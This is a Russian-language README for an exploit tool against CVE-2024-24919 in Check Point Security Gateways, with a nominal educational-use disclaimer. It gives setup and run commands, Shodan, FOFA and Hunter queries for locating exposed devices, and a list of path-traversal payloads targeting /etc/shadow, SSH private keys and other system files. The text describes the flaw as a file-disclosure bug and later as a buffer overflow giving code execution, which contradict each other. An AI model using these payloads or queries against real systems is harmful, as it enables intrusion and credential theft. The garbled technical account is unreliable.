
CVE-2024-24919 exploit
Этот репозиторий содержит инструмент для эксплуатации уязвимости CVE-2024-24919 в Check Point Security Gateways. Инструмент представляет собой мульти-сканер, способный выявлять уязвимые устройства, и одноцелевой эксплойт, позволяющий получить полный контроль над поражённым устройством.
CVE-2024-24919 — это уязвимость высокой степени серьёзности, связанная с раскрытием информации, которая позволяет злоумышленнику удалённо читать произвольные файлы на Check Point Security Gateway. Данная уязвимость может быть использована для кражи конфиденциальной информации, такой как пароли и конфигурационные файлы.
Отказ от ответственности:
Этот инструмент предоставляется только в образовательных целях. Его не следует использовать для атак на уязвимые системы без явного согласия владельца. Авторы этого инструмента не несут ответственности за любой ущерб, возникший в результате его использования.
Эксплойт работает путём отправки специально сформированного HTTP-запроса уязвимому устройству. Запрос вызывает переполнение буфера в прошивке устройства, что позволяет злоумышленнику выполнить произвольный код. Затем эксплойт может быть использован для получения полного контроля над устройством.
git clone https://github.com/your-username/cve-2024-24919.git
cd cve-2024-24919
pip install -r requirements.txt
Вы можете сканировать как одну цель, так и несколько!
python cve-2024-24919.py
# Hunter
Hunter: /product.name="Check Point SSL Network Extender"
# Shodan
SHODAN: http.title="Check Point SSL Network Extender"
# Fofa Query
FOFA: title="Check Point SSL Network Extender"

$ Пути инструмента : ```
'aCSHELL/../../../../../../../../../../../etc/passwd',
'aCSHELL/../../../../../../../../../../../etc/apache2/apache2.conf',
'aCSHELL/../../../../../../../../../../../etc/mysql/my.cnf',
'aCSHELL/../../../../../../../../../../../var/log/syslog',
'aCSHELL/../../../../../../../../../../../var/log/auth.log',
#'aCSHELL/../../../../../../../../../../../var/log/messages',
'aCSHELL/../../../../../../../../../../../etc/group',
'aCSHELL/../../../../../../../../../../../etc/shadow',
'aCSHELL/../../../../../../../../../../../root/.ssh/id_rsa',
'aCSHELL/../../../../../../../../../../../etc/hostname',
'aCSHELL/../../../../../../../../../../../etc/hosts',
'aCSHELL/../../../../../../../../../../../etc/resolv.conf' ```